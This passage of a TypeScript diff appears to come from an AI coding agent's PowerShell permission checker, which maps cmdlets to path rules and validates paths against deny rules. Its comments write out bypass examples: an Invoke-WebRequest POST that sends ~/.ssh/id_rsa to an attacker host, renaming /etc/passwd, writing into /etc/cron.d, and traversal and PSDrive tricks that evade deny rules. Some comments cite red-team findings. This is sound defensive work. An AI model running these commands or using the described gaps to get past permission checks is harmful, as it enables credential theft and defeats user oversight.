+ // New-Item/Copy-Item/Move-Item were missing: `mkdir /etc/cron.d/evil` →
260
+ // resolveToCanonical('mkdir') = 'new-item' via COMMON_ALIASES → not in
261
+ // config → early return {paths:[], 'read'} → Edit deny never consulted.
262
+ //
263
+ // Copy-Item/Move-Item have DUAL path params (-Path source, -Destination
264
+ // dest). operationType:'write' is imperfect — source is semantically a read
265
+ // — but it means BOTH paths get Edit-deny validation, which is strictly
266
+ // safer than extracting neither. A per-param operationType would be ideal
267
+ // but that's a bigger schema change; blunt 'write' closes the gap now.
268
+ 'new-item': {
269
+ operationType: 'write',
270
+ // -Path is position 0. -Name (position 1) is resolved by PowerShell
271
+ // RELATIVE TO -Path (per MS docs: "you can specify the path of the new
272
+ // item in Name"), including `..` traversal. We resolve against CWD
273
+ // (validatePath L930), not -Path — so `New-Item -Path /allowed
274
+ // -Name ../secret/evil` creates /allowed/../secret/evil = /secret/evil,
275
+ // but we resolve cwd/../secret/evil which lands ELSEWHERE and can miss
276
+ // the deny rule. This is a deny→ask downgrade, not fail-safe.
277
+ //
278
+ // -name is in leafOnlyPathParams: simple leaf filenames (`foo.txt`) are
279
+ // extracted (resolves to cwd/foo.txt — slightly wrong, but -Path
280
+ // extraction covers the directory, and a leaf can't traverse);
281
+ // any value with `/`, `\`, `.`, `..` flags hasUnvalidatablePathArg →
282
+ // ask. Joining -Name against -Path would be correct but needs
283
+ // cross-parameter tracking — out of scope here.
284
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
285
+ leafOnlyPathParams: ['-name'],
286
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
287
+ knownValueParams: ['-itemtype', '-value', '-credential', '-type'],
288
+ },
289
+ 'copy-item': {
290
+ operationType: 'write',
291
+ // -Path (position 0) is source, -Destination (position 1) is dest.
292
+ // Both extracted; both validated as write.
293
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destination'],
294
+ knownSwitches: [
295
+ '-container',
296
+ '-force',
297
+ '-passthru',
298
+ '-recurse',
299
+ '-whatif',
300
+ '-confirm',
301
+ '-usetransaction',
302
+ ],
303
+ knownValueParams: [
304
+ '-filter',
305
+ '-include',
306
+ '-exclude',
307
+ '-credential',
308
+ '-fromsession',
309
+ '-tosession',
310
+ ],
311
+ },
312
+ 'move-item': {
313
+ operationType: 'write',
314
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destination'],
315
+ knownSwitches: [
316
+ '-force',
317
+ '-passthru',
318
+ '-whatif',
319
+ '-confirm',
320
+ '-usetransaction',
321
+ ],
322
+ knownValueParams: ['-filter', '-include', '-exclude', '-credential'],
323
+ },
324
+ // rename-item/set-item: same class — ren/rni/si in COMMON_ALIASES, neither
325
+ // was in config. `ren /etc/passwd passwd.bak` → resolves to rename-item
326
+ // → not in config → {paths:[], 'read'} → Edit deny bypassed. This closes
327
+ // the COMMON_ALIASES→CMDLET_PATH_CONFIG coverage audit: every
328
+ // write-cmdlet alias now resolves to a config entry.
329
+ 'rename-item': {
330
+ operationType: 'write',
331
+ // -Path position 0, -NewName position 1. -NewName is leaf-only (docs:
332
+ // "You cannot specify a new drive or a different path") and Rename-Item
333
+ // explicitly rejects `..` in it — so knownValueParams is correct here,
334
+ // unlike New-Item -Name which accepts traversal.
335
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
336
+ knownSwitches: [
337
+ '-force',
338
+ '-passthru',
339
+ '-whatif',
340
+ '-confirm',
341
+ '-usetransaction',
342
+ ],
343
+ knownValueParams: [
344
+ '-newname',
345
+ '-credential',
346
+ '-filter',
347
+ '-include',
348
+ '-exclude',
349
+ ],
350
+ },
351
+ 'set-item': {
352
+ operationType: 'write',
353
+ // FileSystem provider throws NotSupportedException for Set-Item content,
354
+ // so the practical write surface is registry/env/function/alias providers.
355
+ // Provider-qualified paths (HKLM:\\, Env:\\) are independently caught at
356
+ // step 3.5 in powershellPermissions.ts, but classifying set-item as write
357
+ // here is defense-in-depth — powershellSecurity.ts:379 already lists it
358
+ // in ENV_WRITE_CMDLETS; this makes pathValidation consistent.
359
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
360
+ knownSwitches: [
361
+ '-force',
362
+ '-passthru',
363
+ '-whatif',
364
+ '-confirm',
365
+ '-usetransaction',
366
+ ],
367
+ knownValueParams: [
368
+ '-value',
369
+ '-credential',
370
+ '-filter',
371
+ '-include',
372
+ '-exclude',
373
+ ],
374
+ },
375
+ // ─── Read operations ──────────────────────────────────────────────────────
376
+ 'get-content': {
377
+ operationType: 'read',
378
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
379
+ knownSwitches: [
380
+ '-force',
381
+ '-usetransaction',
382
+ '-wait',
383
+ '-raw',
384
+ '-asbytestream', // PS 6+
385
+ ],
386
+ knownValueParams: [
387
+ '-readcount',
388
+ '-totalcount',
389
+ '-tail',
390
+ '-first', // alias for -TotalCount
391
+ '-head', // alias for -TotalCount
392
+ '-last', // alias for -Tail
393
+ '-filter',
394
+ '-include',
395
+ '-exclude',
396
+ '-credential',
397
+ '-delimiter',
398
+ '-encoding',
399
+ '-stream',
400
+ ],
401
+ },
402
+ 'get-childitem': {
403
+ operationType: 'read',
404
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
405
+ knownSwitches: [
406
+ '-recurse',
407
+ '-force',
408
+ '-name',
409
+ '-usetransaction',
410
+ '-followsymlink',
411
+ '-directory',
412
+ '-file',
413
+ '-hidden',
414
+ '-readonly',
415
+ '-system',
416
+ ],
417
+ knownValueParams: [
418
+ '-filter',
419
+ '-include',
420
+ '-exclude',
421
+ '-depth',
422
+ '-attributes',
423
+ '-credential',
424
+ ],
425
+ },
426
+ 'get-item': {
427
+ operationType: 'read',
428
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
429
+ knownSwitches: ['-force', '-usetransaction'],
430
+ knownValueParams: [
431
+ '-filter',
432
+ '-include',
433
+ '-exclude',
434
+ '-credential',
435
+ '-stream',
436
+ ],
437
+ },
438
+ 'get-itemproperty': {
439
+ operationType: 'read',
440
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
441
+ knownSwitches: ['-usetransaction'],
442
+ knownValueParams: [
443
+ '-name',
444
+ '-filter',
445
+ '-include',
446
+ '-exclude',
447
+ '-credential',
448
+ ],
449
+ },
450
+ 'get-itempropertyvalue': {
451
+ operationType: 'read',
452
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
453
+ knownSwitches: ['-usetransaction'],
454
+ knownValueParams: [
455
+ '-name',
456
+ '-filter',
457
+ '-include',
458
+ '-exclude',
459
+ '-credential',
460
+ ],
461
+ },
462
+ 'get-filehash': {
463
+ operationType: 'read',
464
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
465
+ knownSwitches: [],
466
+ knownValueParams: ['-algorithm', '-inputstream'],
467
+ },
468
+ 'get-acl': {
469
+ operationType: 'read',
470
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
471
+ knownSwitches: ['-audit', '-allcentralaccesspolicies', '-usetransaction'],
472
+ knownValueParams: ['-inputobject', '-filter', '-include', '-exclude'],
473
+ },
474
+ 'format-hex': {
475
+ operationType: 'read',
476
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
477
+ knownSwitches: ['-raw'],
478
+ knownValueParams: [
479
+ '-inputobject',
480
+ '-encoding',
481
+ '-count', // PS 6+
482
+ '-offset', // PS 6+
483
+ ],
484
+ },
485
+ 'test-path': {
486
+ operationType: 'read',
487
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
488
+ knownSwitches: ['-isvalid', '-usetransaction'],
489
+ knownValueParams: [
490
+ '-filter',
491
+ '-include',
492
+ '-exclude',
493
+ '-pathtype',
494
+ '-credential',
495
+ '-olderthan',
496
+ '-newerthan',
497
+ ],
498
+ },
499
+ 'resolve-path': {
500
+ operationType: 'read',
501
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
502
+ knownSwitches: ['-relative', '-usetransaction', '-force'],
503
+ knownValueParams: ['-credential', '-relativebasepath'],
504
+ },
505
+ 'convert-path': {
506
+ operationType: 'read',
507
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
508
+ knownSwitches: ['-usetransaction'],
509
+ knownValueParams: [],
510
+ },
511
+ 'select-string': {
512
+ operationType: 'read',
513
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
514
+ knownSwitches: [
515
+ '-simplematch',
516
+ '-casesensitive',
517
+ '-quiet',
518
+ '-list',
519
+ '-notmatch',
520
+ '-allmatches',
521
+ '-noemphasis', // PS 7+
522
+ '-raw', // PS 7+
523
+ ],
524
+ knownValueParams: [
525
+ '-inputobject',
526
+ '-pattern',
527
+ '-include',
528
+ '-exclude',
529
+ '-encoding',
530
+ '-context',
531
+ '-culture', // PS 7+
532
+ ],
533
+ },
534
+ 'set-location': {
535
+ operationType: 'read',
536
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
537
+ knownSwitches: ['-passthru', '-usetransaction'],
538
+ knownValueParams: ['-stackname'],
539
+ },
540
+ 'push-location': {
541
+ operationType: 'read',
542
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
543
+ knownSwitches: ['-passthru', '-usetransaction'],
544
+ knownValueParams: ['-stackname'],
545
+ },
546
+ 'pop-location': {
547
+ operationType: 'read',
548
+ // Pop-Location has no -Path/-LiteralPath (it pops from the stack),
549
+ // but we keep the entry so it passes through path validation gracefully.
550
+ pathParams: [],
551
+ knownSwitches: ['-passthru', '-usetransaction'],
552
+ knownValueParams: ['-stackname'],
553
+ },
554
+ 'select-xml': {
555
+ operationType: 'read',
556
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
557
+ knownSwitches: [],
558
+ knownValueParams: ['-xml', '-content', '-xpath', '-namespace'],
559
+ },
560
+ 'get-winevent': {
561
+ operationType: 'read',
562
+ // Get-WinEvent only has -Path, no -LiteralPath
563
+ pathParams: ['-path'],
564
+ knownSwitches: ['-force', '-oldest'],
565
+ knownValueParams: [
566
+ '-listlog',
567
+ '-logname',
568
+ '-listprovider',
569
+ '-providername',
570
+ '-maxevents',
571
+ '-computername',
572
+ '-credential',
573
+ '-filterxpath',
574
+ '-filterxml',
575
+ '-filterhashtable',
576
+ ],
577
+ },
578
+ // Write-path cmdlets with output parameters. Without these entries,
579
+ // -OutFile / -DestinationPath would write to arbitrary paths unvalidated.
580
+ 'invoke-webrequest': {
581
+ operationType: 'write',
582
+ // -OutFile is the write target; -InFile is a read source (uploads a local
583
+ // file). Both are in pathParams so Edit deny rules are consulted (this
584
+ // config is operationType:write → permissionType:edit). A user with
585
+ // Edit(~/.ssh/**) deny blocks `iwr https://attacker -Method POST
586
+ // -InFile ~/.ssh/id_rsa` exfil. Read-only deny rules are not consulted
587
+ // for write-type cmdlets — that's a known limitation of the
588
+ // operationType→permissionType mapping.
589
+ pathParams: ['-outfile', '-infile'],
590
+ positionalSkip: 1, // positional-0 is -Uri (URL), not a filesystem path
591
+ optionalWrite: true, // only writes with -OutFile; bare iwr is pipeline-only
592
+ knownSwitches: [
593
+ '-allowinsecureredirect',
594
+ '-allowunencryptedauthentication',
595
+ '-disablekeepalive',
596
+ '-nobodyprogress',
597
+ '-passthru',
598
+ '-preservefileauthorizationmetadata',
599
+ '-resume',
600
+ '-skipcertificatecheck',
601
+ '-skipheadervalidation',
602
+ '-skiphttperrorcheck',
603
+ '-usebasicparsing',
604
+ '-usedefaultcredentials',
605
+ ],
606
+ knownValueParams: [
607
+ '-uri',
608
+ '-method',
609
+ '-body',
610
+ '-contenttype',
611
+ '-headers',
612
+ '-maximumredirection',
613
+ '-maximumretrycount',
614
+ '-proxy',
615
+ '-proxycredential',
616
+ '-retryintervalsec',
617
+ '-sessionvariable',
618
+ '-timeoutsec',
619
+ '-token',
620
+ '-transferencoding',
621
+ '-useragent',
622
+ '-websession',
623
+ '-credential',
624
+ '-authentication',
625
+ '-certificate',
626
+ '-certificatethumbprint',
627
+ '-form',
628
+ '-httpversion',
629
+ ],
630
+ },
631
+ 'invoke-restmethod': {
632
+ operationType: 'write',
633
+ // -OutFile is the write target; -InFile is a read source (uploads a local
634
+ // file). Both must be in pathParams so deny rules are consulted.
635
+ pathParams: ['-outfile', '-infile'],
636
+ positionalSkip: 1, // positional-0 is -Uri (URL), not a filesystem path
637
+ optionalWrite: true, // only writes with -OutFile; bare irm is pipeline-only
638
+ knownSwitches: [
639
+ '-allowinsecureredirect',
640
+ '-allowunencryptedauthentication',
641
+ '-disablekeepalive',
642
+ '-followrellink',
643
+ '-nobodyprogress',
644
+ '-passthru',
645
+ '-preservefileauthorizationmetadata',
646
+ '-resume',
647
+ '-skipcertificatecheck',
648
+ '-skipheadervalidation',
649
+ '-skiphttperrorcheck',
650
+ '-usebasicparsing',
651
+ '-usedefaultcredentials',
652
+ ],
653
+ knownValueParams: [
654
+ '-uri',
655
+ '-method',
656
+ '-body',
657
+ '-contenttype',
658
+ '-headers',
659
+ '-maximumfollowrellink',
660
+ '-maximumredirection',
661
+ '-maximumretrycount',
662
+ '-proxy',
663
+ '-proxycredential',
664
+ '-responseheaderstvariable',
665
+ '-retryintervalsec',
666
+ '-sessionvariable',
667
+ '-statuscodevariable',
668
+ '-timeoutsec',
669
+ '-token',
670
+ '-transferencoding',
671
+ '-useragent',
672
+ '-websession',
673
+ '-credential',
674
+ '-authentication',
675
+ '-certificate',
676
+ '-certificatethumbprint',
677
+ '-form',
678
+ '-httpversion',
679
+ ],
680
+ },
681
+ 'expand-archive': {
682
+ operationType: 'write',
683
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destinationpath'],
684
+ knownSwitches: ['-force', '-passthru', '-whatif', '-confirm'],
685
+ knownValueParams: [],
686
+ },
687
+ 'compress-archive': {
688
+ operationType: 'write',
689
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destinationpath'],
690
+ knownSwitches: ['-force', '-update', '-passthru', '-whatif', '-confirm'],
691
+ knownValueParams: ['-compressionlevel'],
692
+ },
693
+ // *-ItemProperty cmdlets: primary use is the Registry provider (set/new/
694
+ // remove a registry VALUE under a key). Provider-qualified paths (HKLM:\,
695
+ // HKCU:\) are independently caught at step 3.5 in powershellPermissions.ts.
696
+ // Entries here are defense-in-depth for Edit-deny-rule consultation, mirroring
697
+ // set-item's rationale.
698
+ 'set-itemproperty': {
699
+ operationType: 'write',
700
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
701
+ knownSwitches: [
702
+ '-passthru',
703
+ '-force',
704
+ '-whatif',
705
+ '-confirm',
706
+ '-usetransaction',
707
+ ],
708
+ knownValueParams: [
709
+ '-name',
710
+ '-value',
711
+ '-type',
712
+ '-filter',
713
+ '-include',
714
+ '-exclude',
715
+ '-credential',
716
+ '-inputobject',
717
+ ],
718
+ },
719
+ 'new-itemproperty': {
720
+ operationType: 'write',
721
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
722
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
723
+ knownValueParams: [
724
+ '-name',
725
+ '-value',
726
+ '-propertytype',
727
+ '-type',
728
+ '-filter',
729
+ '-include',
730
+ '-exclude',
731
+ '-credential',
732
+ ],
733
+ },
734
+ 'remove-itemproperty': {
735
+ operationType: 'write',
736
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
737
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
738
+ knownValueParams: [
739
+ '-name',
740
+ '-filter',
741
+ '-include',
742
+ '-exclude',
743
+ '-credential',
744
+ ],
745
+ },
746
+ 'clear-item': {
747
+ operationType: 'write',
748
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
749
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
750
+ knownValueParams: ['-filter', '-include', '-exclude', '-credential'],
751
+ },
752
+ 'export-alias': {
753
+ operationType: 'write',
754
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
755
+ knownSwitches: [
756
+ '-append',
757
+ '-force',
758
+ '-noclobber',
759
+ '-passthru',
760
+ '-whatif',
761
+ '-confirm',
762
+ ],
763
+ knownValueParams: ['-name', '-description', '-scope', '-as'],
764
+ },
765
+ }
766
+
767
+ /**
768
+ * Checks if a lowercase parameter name (with leading dash) matches any entry
769
+ * in the given param list, accounting for PowerShell's prefix-matching behavior
770
+ * (e.g., -Lit matches -LiteralPath).
771
+ */
772
+ function matchesParam(paramLower: string, paramList: string[]): boolean {
773
+ for (const p of paramList) {
774
+ if (
775
+ p === paramLower ||
776
+ (paramLower.length > 1 && p.startsWith(paramLower))
777
+ ) {
778
+ return true
779
+ }
780
+ }
781
+ return false
782
+ }
783
+
784
+ /**
785
+ * Returns true if a colon-syntax value contains expression constructs that
786
+ * mask the real runtime path (arrays, subexpressions, variables, backtick
787
+ * escapes). The outer CommandParameterAst 'Parameter' element type hides
788
+ * these from our AST walk, so we must detect them textually.
789
+ *
790
+ * Used in three branches of extractPathsFromCommand: pathParams,
791
+ * leafOnlyPathParams, and the unknown-param defense-in-depth branch.
792
+ */
793
+ function hasComplexColonValue(rawValue: string): boolean {
794
+ return (
795
+ rawValue.includes(',') ||
796
+ rawValue.startsWith('(') ||
797
+ rawValue.startsWith('[') ||
798
+ rawValue.includes('`') ||
799
+ rawValue.includes('@(') ||
800
+ rawValue.startsWith('@{') ||
801
+ rawValue.includes('$')
802
+ )
803
+ }
804
+
805
+ function formatDirectoryList(directories: string[]): string {
806
+ const dirCount = directories.length
807
+ if (dirCount <= MAX_DIRS_TO_LIST) {
808
+ return directories.map(dir => `'${dir}'`).join(', ')
809
+ }
810
+ const firstDirs = directories
811
+ .slice(0, MAX_DIRS_TO_LIST)
812
+ .map(dir => `'${dir}'`)
813
+ .join(', ')
814
+ return `${firstDirs}, and ${dirCount - MAX_DIRS_TO_LIST} more`
815
+ }
816
+
817
+ /**
818
+ * Expands tilde (~) at the start of a path to the user's home directory.
819
+ */
820
+ function expandTilde(filePath: string): string {
821
+ if (
822
+ filePath === '~' ||
823
+ filePath.startsWith('~/') ||
824
+ filePath.startsWith('~\\')
825
+ ) {
826
+ return homedir() + filePath.slice(1)
827
+ }
828
+ return filePath
829
+ }
830
+
831
+ /**
832
+ * Checks the raw user-provided path (pre-realpath) for dangerous removal
833
+ * targets. safeResolvePath/realpathSync canonicalizes in ways that defeat
834
+ * isDangerousRemovalPath: on Windows '/' → 'C:\' (fails the === '/' check);
835
+ * on macOS homedir() may be under /var which realpathSync rewrites to
836
+ * /private/var (fails the === homedir() check). Checking the tilde-expanded,
837
+ * backslash-normalized form catches the dangerous shapes (/, ~, /etc, /usr)
838
+ * as the user typed them.
839
+ */
840
+ export function isDangerousRemovalRawPath(filePath: string): boolean {
841
+ const expanded = expandTilde(filePath.replace(/^['"]|['"]$/g, '')).replace(
842
+ /\\/g,
843
+ '/',
844
+ )
845
+ return isDangerousRemovalPath(expanded)
846
+ }
847
+
848
+ export function dangerousRemovalDeny(path: string): PermissionResult {
849
+ return {
850
+ behavior: 'deny',
851
+ message: `Remove-Item on system path '${path}' is blocked. This path is protected from removal.`,
852
+ decisionReason: {
853
+ type: 'other',
854
+ reason: 'Removal targets a protected system path',
855
+ },
856
+ }
857
+ }
858
+
859
+ /**
860
+ * Checks if a resolved path is allowed for the given operation type.
861
+ * Mirrors the logic in BashTool/pathValidation.ts isPathAllowed.
862
+ */
863
+ function isPathAllowed(
864
+ resolvedPath: string,
865
+ context: ToolPermissionContext,
866
+ operationType: FileOperationType,
867
+ precomputedPathsToCheck?: readonly string[],
868
+ ): PathCheckResult {
869
+ const permissionType = operationType === 'read' ? 'read' : 'edit'
870
+
871
+ // 1. Check deny rules first
872
+ const denyRule = matchingRuleForInput(
873
+ resolvedPath,
874
+ context,
875
+ permissionType,
876
+ 'deny',
877
+ )
878
+ if (denyRule !== null) {
879
+ return {
880
+ allowed: false,
881
+ decisionReason: { type: 'rule', rule: denyRule },
882
+ }
883
+ }
884
+
885
+ // 2. For write/create operations, check internal editable paths (plan files, scratchpad, agent memory, job dirs)
886
+ // This MUST come before checkPathSafetyForAutoEdit since .claude is a dangerous directory
887
+ // and internal editable paths live under ~/.claude/ — matching the ordering in
888
+ // checkWritePermissionForTool (filesystem.ts step 1.5)
889
+ if (operationType !== 'read') {
890
+ const internalEditResult = checkEditableInternalPath(resolvedPath, {})
891
+ if (internalEditResult.behavior === 'allow') {
892
+ return {
893
+ allowed: true,
894
+ decisionReason: internalEditResult.decisionReason,
895
+ }
896
+ }
897
+ }
898
+
899
+ // 2.5. For write/create operations, check safety validations
900
+ if (operationType !== 'read') {
901
+ const safetyCheck = checkPathSafetyForAutoEdit(
902
+ resolvedPath,
903
+ precomputedPathsToCheck,
904
+ )
905
+ if (!safetyCheck.safe) {
906
+ return {
907
+ allowed: false,
908
+ decisionReason: {
909
+ type: 'safetyCheck',
910
+ reason: safetyCheck.message,
911
+ classifierApprovable: safetyCheck.classifierApprovable,
912
+ },
913
+ }
914
+ }
915
+ }
916
+
917
+ // 3. Check if path is in allowed working directory
918
+ const isInWorkingDir = pathInAllowedWorkingPath(
919
+ resolvedPath,
920
+ context,
921
+ precomputedPathsToCheck,
922
+ )
923
+ if (isInWorkingDir) {
924
+ if (operationType === 'read' || context.mode === 'acceptEdits') {
925
+ return { allowed: true }
926
+ }
927
+ }
928
+
929
+ // 3.5. For read operations, check internal readable paths
930
+ if (operationType === 'read') {
931
+ const internalReadResult = checkReadableInternalPath(resolvedPath, {})
932
+ if (internalReadResult.behavior === 'allow') {
933
+ return {
934
+ allowed: true,
935
+ decisionReason: internalReadResult.decisionReason,
936
+ }
937
+ }
938
+ }
939
+
940
+ // 3.7. For write/create operations to paths OUTSIDE the working directory,
941
+ // check the sandbox write allowlist. When the sandbox is enabled, users
942
+ // have explicitly configured writable directories (e.g. /tmp/claude/) —
943
+ // treat these as additional allowed write directories so redirects/Out-File/
944
+ // New-Item don't prompt unnecessarily. Paths IN the working directory are
945
+ // excluded: the sandbox allowlist always seeds '.' (cwd), which would
946
+ // bypass the acceptEdits gate at step 3.
947
+ if (
948
+ operationType !== 'read' &&
949
+ !isInWorkingDir &&
950
+ isPathInSandboxWriteAllowlist(resolvedPath)
951
+ ) {
952
+ return {
953
+ allowed: true,
954
+ decisionReason: {
955
+ type: 'other',
956
+ reason: 'Path is in sandbox write allowlist',
957
+ },
958
+ }
959
+ }
960
+
961
+ // 4. Check allow rules
962
+ const allowRule = matchingRuleForInput(
963
+ resolvedPath,
964
+ context,
965
+ permissionType,
966
+ 'allow',
967
+ )
968
+ if (allowRule !== null) {
969
+ return {
970
+ allowed: true,
971
+ decisionReason: { type: 'rule', rule: allowRule },
972
+ }
973
+ }
974
+
975
+ // 5. Path is not allowed
976
+ return { allowed: false }
977
+ }
978
+
979
+ /**
980
+ * Best-effort deny check for paths obscured by :: or backtick syntax.
981
+ * ONLY checks deny rules — never auto-allows. If the stripped guess
982
+ * doesn't match a deny rule, we fall through to ask as before.
983
+ */
984
+ function checkDenyRuleForGuessedPath(
985
+ strippedPath: string,
986
+ cwd: string,
987
+ toolPermissionContext: ToolPermissionContext,
988
+ operationType: FileOperationType,
989
+ ): { resolvedPath: string; rule: PermissionRule } | null {
990
+ // Red-team P7: null bytes make expandPath throw. Pre-existing but
991
+ // defend here since we're introducing a new call path.
992
+ if (!strippedPath || strippedPath.includes('\0')) return null
993
+ // Red-team P3: `~/.ssh/x strips to ~/.ssh/x but expandTilde only fires
994
+ // on leading ~ — the backtick was in front of it. Re-run here.
995
+ const tildeExpanded = expandTilde(strippedPath)
996
+ const abs = isAbsolute(tildeExpanded)
997
+ ? tildeExpanded
998
+ : resolve(cwd, tildeExpanded)
999
+ const { resolvedPath } = safeResolvePath(getFsImplementation(), abs)
1000
+ const permissionType = operationType === 'read' ? 'read' : 'edit'
1001
+ const denyRule = matchingRuleForInput(
1002
+ resolvedPath,
1003
+ toolPermissionContext,
1004
+ permissionType,
1005
+ 'deny',
1006
+ )
1007
+ return denyRule ? { resolvedPath, rule: denyRule } : null
1008
+ }
1009
+
1010
+ /**
1011
+ * Validates a file system path, handling tilde expansion.
1012
+ */
1013
+ function validatePath(
1014
+ filePath: string,
1015
+ cwd: string,
1016
+ toolPermissionContext: ToolPermissionContext,
1017
+ operationType: FileOperationType,
1018
+ ): ResolvedPathCheckResult {
1019
+ // Remove surrounding quotes if present
1020
+ const cleanPath = expandTilde(filePath.replace(/^['"]|['"]$/g, ''))
1021
+
1022
+ // SECURITY: PowerShell Core normalizes backslashes to forward slashes on all
1023
+ // platforms, but path.resolve on Linux/Mac treats them as literal characters.
1024
+ // Normalize before resolution so traversal patterns like dir\..\..\etc\shadow
1025
+ // are correctly detected.
1026
+ const normalizedPath = cleanPath.replace(/\\/g, '/')
1027
+
1028
+ // SECURITY: Backtick (`) is PowerShell's escape character. It is a no-op in
1029
+ // many positions (e.g., `/ === /) but defeats Node.js path checks like
1030
+ // isAbsolute(). Redirection targets use raw .Extent.Text which preserves
1031
+ // backtick escapes. Treat any path containing a backtick as unvalidatable.
1032
+ if (normalizedPath.includes('`')) {
1033
+ // Red-team P3: backtick is already resolved for StringConstant args
1034
+ // (parser uses .value); this guard primarily fires for redirection
1035
+ // targets which use raw .Extent.Text. Strip is a no-op for most special
1036
+ // escapes (`n → n) but that's fine — wrong guess → no deny match →
1037
+ // falls to ask.
1038
+ const backtickStripped = normalizedPath.replace(/`/g, '')
1039
+ const denyHit = checkDenyRuleForGuessedPath(
1040
+ backtickStripped,
1041
+ cwd,
1042
+ toolPermissionContext,
1043
+ operationType,
1044
+ )
1045
+ if (denyHit) {
1046
+ return {
1047
+ allowed: false,
1048
+ resolvedPath: denyHit.resolvedPath,
1049
+ decisionReason: { type: 'rule', rule: denyHit.rule },
1050
+ }
1051
+ }
1052
+ return {
1053
+ allowed: false,
1054
+ resolvedPath: normalizedPath,
1055
+ decisionReason: {
1056
+ type: 'other',
1057
+ reason:
1058
+ 'Backtick escape characters in paths cannot be statically validated and require manual approval',
1059
+ },
1060
+ }
1061
+ }
1062
+
1063
+ // SECURITY: Block module-qualified provider paths. PowerShell allows
1064
+ // `Microsoft.PowerShell.Core\FileSystem::/etc/passwd` which resolves to
1065
+ // `/etc/passwd` via the FileSystem provider. The `::` is the provider
1066
+ // path separator and doesn't match the simple `^[a-z]{2,}:` regex.
1067
+ if (normalizedPath.includes('::')) {
1068
+ // Strip everything up to and including the first :: — handles both
1069
+ // FileSystem::/path and Microsoft.PowerShell.Core\FileSystem::/path.
1070
+ // Double-:: (Foo::Bar::/x) strips first only → 'Bar::/x' → resolve
1071
+ // makes it {cwd}/Bar::/x → won't match real deny rules → falls to ask.
1072
+ // Safe.
1073
+ const afterProvider = normalizedPath.slice(normalizedPath.indexOf('::') + 2)
1074
+ const denyHit = checkDenyRuleForGuessedPath(
1075
+ afterProvider,
1076
+ cwd,
1077
+ toolPermissionContext,
1078
+ operationType,
1079
+ )
1080
+ if (denyHit) {
1081
+ return {
1082
+ allowed: false,
1083
+ resolvedPath: denyHit.resolvedPath,
1084
+ decisionReason: { type: 'rule', rule: denyHit.rule },
1085
+ }
1086
+ }
1087
+ return {
1088
+ allowed: false,
1089
+ resolvedPath: normalizedPath,
1090
+ decisionReason: {
1091
+ type: 'other',
1092
+ reason:
1093
+ 'Module-qualified provider paths (::) cannot be statically validated and require manual approval',
1094
+ },
1095
+ }
1096
+ }
1097
+
1098
+ // SECURITY: Block UNC paths — they can trigger network requests and
1099
+ // leak NTLM/Kerberos credentials
1100
+ if (
1101
+ normalizedPath.startsWith('//') ||
1102
+ /DavWWWRoot/i.test(normalizedPath) ||
1103
+ /@SSL@/i.test(normalizedPath)
1104
+ ) {
1105
+ return {
1106
+ allowed: false,
1107
+ resolvedPath: normalizedPath,
1108
+ decisionReason: {
1109
+ type: 'other',
1110
+ reason:
1111
+ 'UNC paths are blocked because they can trigger network requests and credential leakage',
1112
+ },
1113
+ }
1114
+ }
1115
+
1116
+ // SECURITY: Reject paths containing shell expansion syntax
1117
+ if (normalizedPath.includes('$') || normalizedPath.includes('%')) {
1118
+ return {
1119
+ allowed: false,
1120
+ resolvedPath: normalizedPath,
1121
+ decisionReason: {
1122
+ type: 'other',
1123
+ reason: 'Variable expansion syntax in paths requires manual approval',
1124
+ },
1125
+ }
1126
+ }
1127
+
1128
+ // SECURITY: Block non-filesystem provider paths (env:, HKLM:, alias:, function:, etc.)
1129
+ // These paths access non-filesystem resources and must require manual approval.
1130
+ // This catches colon-syntax like -Path:env:HOME where the extracted value is 'env:HOME'.
1131
+ //
1132
+ // Platform split (findings #21/#28):
1133
+ // - Windows: require 2+ letters before ':' so native drive letters (C:, D:)
1134
+ // pass through to path.win32.isAbsolute/resolve which handle them correctly.
1135
+ // - POSIX: ANY <letters>: prefix is a PowerShell PSDrive — single-letter drive
1136
+ // paths have no native meaning on Linux/macOS. `New-PSDrive -Name Z -Root /etc`
1137
+ // then `Get-Content Z:/secrets` would otherwise resolve via
1138
+ // path.posix.resolve(cwd, 'Z:/secrets') → '{cwd}/Z:/secrets' → inside cwd →
1139
+ // allowed, bypassing Read(/etc/**) deny rules. We cannot statically know what
1140
+ // filesystem root a PSDrive maps to, so treat all drive-prefixed paths on
1141
+ // POSIX as unvalidatable.
1142
+ // Include digits in PSDrive name (bug #23): `New-PSDrive -Name 1 ...`
1143
+ // creates drive `1:` — a valid PSDrive path prefix.
1144
+ // Windows regex requires 2+ chars to exclude single-letter native drive letters
1145
+ // (C:, D:). Use a single character class [a-z0-9] to catch mixed alphanumeric
1146
+ // PSDrive names like `a1:`, `1a:` — the previous alternation `[a-z]{2,}|[0-9]+`
1147
